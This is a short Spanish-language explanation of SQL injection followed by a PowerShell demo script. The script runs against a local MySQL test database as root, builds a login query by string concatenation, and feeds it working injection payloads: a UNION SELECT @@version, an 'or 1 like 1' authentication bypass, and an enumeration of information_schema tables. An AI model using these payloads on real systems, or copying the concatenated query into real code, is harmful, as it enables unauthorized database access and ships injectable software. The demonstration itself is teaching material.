Inyección SQL es un método de infiltración de código intruso que se vale de una vulnerabilidad informática presente en una aplicación en el nivel de validación de las entradas para realizar operaciones sobre una base de datos.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
[void][System.Reflection.Assembly]::LoadWithPartialName("MySql.Data") $Connection = New-Object MySql.Data.MySqlClient.MySqlConnection $ConnectionString = "server=" + "localhost" + ";port=3306;uid=" + "root" + ";pwd=" + ";database="+"test" $Connection.ConnectionString = $ConnectionString $Connection.Open() $introduzcatabla = "'12364' union SELECT @@version --" ## Otros ejemplos # $introduzcatabla = "'1234' or 1 like 1" # $Query='select * from tabla1 where user like "juan" and pass like "'+$introduzcatabla+'"' # $Query='select * from tabla1 where 1 like 1 or user like "juan" and pass like "'+$introduzcatabla+'"' # $introduzcatabla = "'1234' union SELECT @@version --" # $introduzcatabla = "'1234' union SELECT TABLE_NAME FROM information_schema.tables" $Query='select user from tabla1 where user like "juan" and pass like '+$introduzcatabla+'' $Command = New-Object MySql.Data.MySqlClient.MySqlCommand($Query, $Connection) $DataAdapter = New-Object MySql.Data.MySqlClient.MySqlDataAdapter($Command) $DataSet = New-Object System.Data.DataSet $RecordCount = $dataAdapter.Fill($dataSet, "data") $DataSet.Tables[0] if($RecordCount) { "login correcto" } $Connection.Close() |